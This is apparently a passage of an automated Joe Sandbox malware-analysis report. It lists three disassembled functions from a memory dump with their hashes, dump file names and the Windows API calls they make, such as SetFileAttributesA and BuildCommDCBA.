• Opcode Fuzzy Hash: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
• Instruction Fuzzy Hash: E33160F2900608EFDB00DF94D849BEEB7B4FB48720F204219F514A7280D7B59940CBA9
APIs
• SetLastError.KERNEL32(00000008), ref: 5BB3E3BE
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E3CE
  • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
• ObjectCloseAuditAlarmA.ADVAPI32(00000000,?,?), ref: 5BB3E3ED
• GlobalFree.KERNEL32(00000000), ref: 5BB3E400
Memory Dump Source
• Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
Similarity
• API ID: ByteCharFromMultiWide$AlarmAuditCloseErrorFreeGlobalLastObject
• String ID:
• API String ID: 570505851-0
• Opcode ID: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
• Instruction ID: fca22863d3f99f943faca69b11e91b9c4a69742eecb687ada413b4a94e761a88
• Opcode Fuzzy Hash: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
• Instruction Fuzzy Hash: AA01ECB6901208EFDB01DFA4C948B9EBBB5FB48301F108159F905A7280D7B69B84EB65
APIs
• SetLastError.KERNEL32(00000008), ref: 5BB3EBCE
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3EBDE
  • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
• BuildCommDCBA.KERNEL32(00000000,?), ref: 5BB3EBF9
• GlobalFree.KERNEL32(00000000), ref: 5BB3EC0C
Memory Dump Source
• Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
Similarity
• API ID: ByteCharFromMultiWide$BuildCommErrorFreeGlobalLast
• String ID:
• API String ID: 4064689889-0
• Opcode ID: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
• Instruction ID: 66abab8c7e1535f856746cbf6b9673e718472d6d819d40f5254c54d6cde24bf2
• Opcode Fuzzy Hash: 2cf87441c1fdc0f2c5e709e05b10e42c50fec51e4941199853f120ae12a6626a
• Instruction Fuzzy Hash: 01F0A9B5900208EFDB01DFA4D489BDDBBB5FB04301F508559F905AB280D7F69A84EB65
APIs
• SetLastError.KERNEL32(00000008), ref: 5BB3CFB5
• newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3CFC5
  • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
• SetFileAttributesA.KERNEL32(00000000,?), ref: 5BB3CFE0
• GlobalFree.KERNEL32(00000000), ref: 5BB3CFF3
Memory Dump Source
• Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
• Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
Similarity
• API ID: ByteCharFromMultiWide$AttributesErrorFileFreeGlobalLast
• String ID:
• API String ID: 3187813303-0
• Opcode ID: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
• Instruction ID: adafb9b8c4b08c4cddb16dacd5f7d1431cc2158b52c0befcf79a861fce84e049
• Opcode Fuzzy Hash: 8ff9a0fde598f3c7797b3ebd963561f9482c9414ad01d04c88dc2cd2cfa20510
• Instruction Fuzzy Hash: 19F09CB6900208EFDB00DFE4D449B9DBBB5FB08301F208159E505A7284D7B69688DB95